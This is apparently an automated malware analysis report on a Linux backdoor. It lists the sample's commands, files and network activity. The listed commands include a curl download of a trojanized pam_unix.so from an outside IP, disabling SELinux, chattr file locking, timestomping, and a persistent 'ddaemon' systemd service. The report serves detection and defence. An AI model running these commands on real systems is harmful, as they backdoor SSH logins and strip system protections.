Technical Information
Malicious functions:
Removes the following system files:
- /usr/bin/jc_new.sh
Manages services:
- ['systemctl', 'restart', 'sshd']
- ['systemctl', 'daemon-reload']
- ['systemctl', 'enable', 'ddaemon']
- ['systemctl', 'start', 'ddaemon']
Launches processes:
- sh /usr/bin/jc_new.sh
- tr -d .
- mv /lib/x86_64-linux-gnu/security/pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so.bak
- chattr +ia /etc/selinux/config
- cut -c1-3
- chattr +ia /lib/x86_64-linux-gnu/security/pam_unix.so
- sed -i s/^UsePAM no/UsePAM yes/ /etc/ssh/sshd_config
- head -1
- grep -oP pam-\x5cK[\x5cd\x5c.]+
- sed -i s/SELINUX=enforcing/SELINUX=disabled/ /etc/selinux/config
- touch /lib/x86_64-linux-gnu/security/pam_unix.so -r /lib/x86_64-linux-gnu/security/pam_unix.so.bak
- chmod 644 /lib/x86_64-linux-gnu/security/pam_unix.so
- curl -o /lib/x86_64-linux-gnu/security/pam_unix.so http://103.101.205.192:90/jc/pam_unix.so_v
- /bin/sh /usr/bin/which curl
- rm -- /usr/bin/jc_new.sh
- chattr -ia /lib/x86_64-linux-gnu/security/pam_unix.so
Performs operations with the file system:
Modifies file access rights:
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
Modifies file owner:
- /etc/ssh/sed087j9z
Creates or modifies files:
- /run/ddaemon.pid
- /usr/bin/jc_new.sh
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
- /etc/ssh/sed087j9z
- /etc/systemd/system/ddaemon.service
Locks files:
- /run/ddaemon.pid
Changes time of creation/access/modification of files:
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
Network activity:
Establishes connection:
- 10#.##1.205.192:90
Sends data to the following servers:
- 10#.##1.205.192:90
Receives data from the following servers:
- 10#.##1.205.192:90
